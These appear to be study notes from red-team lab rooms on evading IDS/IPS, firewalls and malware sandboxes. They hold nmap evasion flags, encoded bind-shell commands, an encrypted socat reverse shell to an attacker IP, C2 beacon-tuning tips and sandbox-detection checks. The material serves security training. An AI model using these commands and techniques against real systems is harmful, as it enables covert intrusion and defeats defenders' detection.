Network Security Evasion

[WDavid404]

IDS

• Host-based IDS (HIDS)
• Network-based IDS (NIDS)

[WDavid404]

IDS Engine Types

network traffic

1. Benign traffic: This is the usual traffic that we expect to have and don’t want the IDS to alert us about.
2. Malicious traffic: This is abnormal traffic that we don’t expect to see under normal conditions and consequently want the IDS to detect it.

The detection engine of an IDS:

1. Signature-based
2. Anomaly-based

IDS/IPS Rule Triggering

Each IDS/IPS has a certain syntax to write its rules.

Evasion via Protocol Manipulation

• Evasion via Protocol Manipulation
• Evasion via Payload Manipulation
• Evasion via Route Manipulation
• Evasion via Tactical Denial of Service (DoS)

netcat

For netcat, you can use UDP using the option -u

• ncat -ulvnp PORT_NU
• nc -u TARGET_IP PORT_NUM

nmap

For nmap, you can add the option -g PORT_NUMBER (or --source-port PORT_NUMBER) to make Nmap send all its traffic from a specific source port number. nmap -sS -Pn -g 80 -F MACHINE_IP to make the port scanning traffic appear to be exchanged with an HTTP server at first glance. nmap -sU -Pn -g 53 -F MACHINE_IP to make the traffic appear to be exchanged with a DNS server.

Use Session Splicing (IP Packet Fragmentation)

fragroute -f fragroute.conf HOST

Sending Invalid Packets

Nmap makes it possible to create invalid packets in a variety of ways. In particular, two common options would be to scan the target using packets that have:

• Invalid TCP/UDP checksum: Nmap lets you send packets with a wrong TCP/UDP checksum using the option --badsum
• Invalid TCP flags: option --scanflags lets you choose which flags you want to set.

  • URG for Urgent
  • ACK for Acknowledge
  • PSH for Push
  • RST for Reset
  • SYN for Synchronize
  • FIN for Finish

Evasion via Payload Manipulation

• Obfuscating and encoding the payload
• Encrypting the communication channel
• Modifying the shellcode

Encode the Payload to Base64 format

pentester@TryHackMe$ cat input.txt
ncat -lvnp 1234 -e /bin/bash
$ base64 input.txt
bmNhdCAtbHZucCAxMjM0IC1lIC9iaW4vYmFzaA==

URL Encoding

pentester@TryHackMe$ urlencode ncat -lvnp 1234 -e /bin/bash
ncat%20-lvnp%201234%20-e%20%2Fbin%2Fbash

Use Escaped Unicode

For example, you can use CyberChef to select and configure the Escape Unicode Characters recipe as shown in the image below.

1. Search for Escape Unicode Characters
2. Drag it to the Recipe column
3. Ensure you a check-mark near Encode all chars with a prefix of \u
4. Ensure you have a check-mark near Uppercase hex with a padding of 4

Encrypt the Communication Channel

Because an IDS/IPS won’t inspect encrypted data, an attacker can take advantage of encryption to evade detection. Unlike encoding, encryption requires an encryption key.

On the attacker system, we carried out the following:

pentester@TryHackMe$ openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.redteam.thm/O=Red Team THM/C=UK' -nodes -keyout thm-reverse.key -out thm-reverse.crt
Generating a RSA private key
........................++++
......++++
writing new private key to 'thm-reverse.key'
-----
pentester@TryHackMe$ ls
thm-reverse.crt  thm-reverse.key
pentester@TryHackMe$ cat thm-reverse.key thm-reverse.crt > thm-reverse.pem
pentester@TryHackMe$ socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT
2022/02/24 13:39:07 socat[1208] W ioctl(6, IOCTL_VM_SOCKETS_GET_LOCAL_CID, ...): Inappropriate ioctl for device
2022/02/24 13:39:07 socat[1208] N listening on AF=2 0.0.0.0:4443

On the victim machine pentester@target$ socat OPENSSL:10.20.30.129:4443,verify=0 EXEC:/bin/bash

Evasion via Route Manipulation

• Relying on source routing
• Using proxy servers

Relying on Source Routing

In many cases, you can use source routing to force the packets to use a certain route to reach their destination. Nmap provides this feature using the option --ip-options

• Loose routing can be specified using L. For instance, --ip-options "L 10.10.10.50 10.10.50.250" requests that your scan packets are routed through the two provided IP addresses.
• Strict routing can be specified using S. Strict routing requires you to set every hop between your system and the target host. For instance, --ip-options "S 10.10.10.1 10.10.20.2 10.10.30.3" specifies that the packets go via these three hops before reaching the target host.

Using Proxy Servers

nmap -sS HTTP://PROXY_HOST1:8080,SOCKS4://PROXY_HOST2:4153 MACHINE_IP. This way, you would make your scan go through HTTP proxy host1, then SOCKS4 proxy host2, before reaching your target. It is important to note that finding a reliable proxy requires some trial and error before you can rely on it to hide your Nmap scan source.

Evasion via Tactical DoS

• Launching denial of service against the IDS/IPS
• Launching denial of Service against the logging server

Consequently, you might find it beneficial if you can:

• Create a huge amount of benign traffic that would simply overload the processing capacity of the IDS/IPS.
• Create a massive amount of not-malicious traffic that would still make it to the logs. This action would congest the communication channel with the logging server or exceed its disk writing capacity.

C2 and IDS/IPS Evasion

Pentesting frameworks, such as Cobalt Strike and Empire, offer malleable Command and Control (C2) profiles. These profiles allow various fine-tuning to evade IDS/IPS systems. If you are using such a framework, it is worth creating a custom profile instead of relying on a default one. Examples variables you can control include the following:

• User-Agent: The tool or framework you are using can expose you via its default-set user-agent. Hence, it is always important to set the user-agent to something innocuous and test to confirm your settings.
• Sleep Time: The sleep time allows you to control the callback interval between beacon check-ins. In other words, you can control how often the infected system will attempt to connect to the control system.
• Jitter: This variable lets you add some randomness to the sleep time, specified by the jitter percentage. A jitter of 30% results in a sleep time of ±30% to further evade detection.
• SSL Certificate: Using your authentic-looking SSL certificate will significantly improve your chances of evading detection. It is a very worthy investment of time.
• DNS Beacon: Consider the case where you are using DNS protocol to exfiltrate data. You can fine-tune DNS beacons by setting the DNS servers and the hostname in the DNS query. The hostname will be holding the exfiltrated data.

Next-Gen Security

Next-Generation Network IPS (NGNIPS) has the following five characteristics according to Gartner:

1. Standard first-generation IPS capabilities: A next-generation network IPS should achieve what a traditional network IPS can do.
2. Application awareness and full-stack visibility: Identify traffic from various applications and enforce the network security policy. An NGNIPS must be able to understand up to the application layer.
3. Context-awareness: Use information from sources outside of the IPS to aid in blocking decisions.
4. Content awareness: Able to inspect and classify files, such as executable programs and documents, in inbound and outbound traffic.
5. Agile engine: Support upgrade paths to benefit from new information feeds.
6. Because a Next-Generation Firewall (NGFW) provides the same functionality as an IPS, it seems that the term NGNIPS is losing popularity for the sake of NGFW. You can read more about NGFW in the Red Team Firewalls room.

[WDavid404]

Firewalls

Evasion via Controlling the Source MAC/IP/Port

In this room, we group Nmap techniques into three groups:

• Evasion via controlling the source MAC/IP/Port
• Evasion via fragmentation, MTU, and data length
• Evasion through modifying header fields

Nmap allows you to hide or spoof the source as you can use:

1. Decoy(s)
2. Proxy
3. Spoofed MAC Address
4. Spoofed Source IP Address
5. Fixed Source Port Number

Decoy(s)

1. Using the -D option, you can add decoy source IP addresses to confuse the target. Consider the following command, nmap -sS -Pn -D 10.10.10.1,10.10.10.2,ME -F MACHINE_IP

2. set Nmap to use random source IP addresses instead of explicitly specifying them. By running nmap -sS -Pn -D RND,RND,ME -F MACHINE_IP

Proxy

nmap -sS -Pn --proxies PROXY_URL -F MACHINE_IP

Spoofed MAC Address

option --spoof-mac MAC_ADDRESS spoofing the MAC address works only if your system is on the same network segment as the target host. The target system is going to reply to a spoofed MAC address

Spoofed IP Address

-S IP_ADDRESS Spoofing the IP address is useful if your system is on the same subnetwork as the target host; otherwise, you won’t be able to read the replies sent back.

Fixed Source Port Number

using -g or --source-port options: nmap -sS -Pn -g 8080 -F MACHINE_IP

Evasion via Forcing Fragmentation, MTU, and Data Length

Fragment Your Packets with 8 Bytes of Data

-f option: This option will fragment the IP packet to carry only 8 bytes of data: nmap -sS -Pn -f -F MACHINE_IP

Fragment Your Packets with 16 Bytes of Data

option is the -ff

Fragment Your Packets According to a Set MTU

--mtu VALUE specifies the number of bytes per IP packet. In other words, the IP header size is not included. The value set for MTU must always be a multiple of 8.

Generate Packets with Specific Length

nmap -sS -Pn --data-length 64 -F MACHINE_IP

Evasion via Modifying Header Fields

Evasion Approach	Nmap Argument
Set IP time-to-live field	--ttl VALUE
Send packets with specified IP options	--ip-options OPTIONS
Send packets with a wrong TCP/UDP checksum	--badsum

e.g. nmap -sS -Pn --ttl 81 -F MACHINE_IP

nmap -sS -Pn --badsum -F MACHINE_IP

Evasion Using Port Hopping

Port hopping is a technique where an application hops from one port to another till it can establish and maintain a connection. In other words, the application might try different ports till it can successfully establish a connection.

Evasion Using Port Tunneling

Port tunneling is also known as port forwarding and port mapping.

ncat -lvnp 443 -c "ncat TARGET_SERVER 25"

• -lvnp 443 listens on TCP port 443. Because the port number is less than 1024, you need to run ncat as root in this case.
• -c or --sh-exec executes the given command via /bin/sh.
• "ncat TARGET_SERVER 25" will connect to the target server at port 25. As a result, ncat will listen on port 443, but it will forward all packets to port 25 on the target server. Because in this case, the firewall is blocking port 25 and allowing port 443, port tunneling is an efficient way to evade the firewall.

Evasion Using Non-Standard Ports

ncat -lvnp PORT_NUMBER -e /bin/bash will create a backdoor via the specified port number that lets you interact with the Bash shell.

[WDavid404]

Sandbox Evasion

One of the most creative and effective ways that Blue Teamers have come up with to analyze suspicious-looking files is in the category of Dynamic Analysis. This method involves running the file in a containerized (or virtualized) environment; This environment is referred to as a Sandbox. Depending on the sandbox of choice, you may be able to customize what version of Windows is running, the software installed on the machine, and much more.

There are various vendors that make various Sandbox products that Blue Teamers may be able to deploy in a corporate network. Here are some popular examples:

• Palo Alto Wildfire (Firewall)
• Proofpoint TAP (Email Sandbox)
• Falcon Sandbox (EDR/Workstation)
• MimeCast (Email Sandbox)
• VirusTotal (Sample Submission Site)
• Any.Run (Sample Submission Site)
• Antiscan.me (Sample Submission Site)
• Joe Sandbox (Sample Submission Site)

Common Sandbox Evasion Techniques

Four broad categories:

• Sleeping through Sandboxes
• Geolocation and Geoblocking
• Checking System Information
• Querying Network Information

Sleeping through Sandboxes

Malware Sandboxes are often limited to a time constraint to prevent the overallocation of resources, which may increase the Sandboxes queue drastically. This is a crucial aspect that we can abuse; if we know that a Sandbox will only run for five minutes at any given time, we can implement a sleep timer that sleeps for five minutes before our shellcode is executed.

Geolocation

One defining factor of Sandboxes is that they are often located off-premise and are hosted by Anti-Virus providers. If you know you are attacking TryHackMe, a European company, and your binary is executed in California, you can make an educated guess that the binary has ended up in a Sandbox.

You may choose to implement a geolocation filter on your program that checks if the IP Address block is owned by the company you are targeting or if it is from a residential address space. There are several services that you can use to check this information:

Checking System Information

Another incredibly popular method is to observe system information. Most Sandboxes typically have reduced resources. A popular Malware Sandbox service, Any.Run, only allocates 1 CPU core and 4GB of RAM per virtual machine. you can expect more than 2 CPU cores per system and more than 4GB of RAM. Knowing this, we can tailor our code to query for basic system info (CPU core count, RAM amount, Disk size, etc).

Querying Network Information

it involves querying information about the Active Directory domain.

Almost no Malware Sandboxes are joined in a domain, so it's relatively safe to assume if the machine is not joined to a domain, it is not the right target! However, you cannot always be too sure, so you should collect some information about the domain to be safe. There are many objects that you can query; here are some to consider:

• Computers
• User accounts
• Last User Login(s)
• Groups
• Domain Admins
• Enterprise Admins
• Domain Controllers
• Service Accounts
• DNS Servers

These techniques can vary in difficulty; therefore, you should consider how much time and effort you want to spend building out these evasion methods. A simple method, such as checking the systems environment variables (this can be done with echo %VARIABLE% or to display all variables, use the set command) for an item like the LogonServer, LogonUserSid, or LogonDomain may be much easier than implementing a Windows API.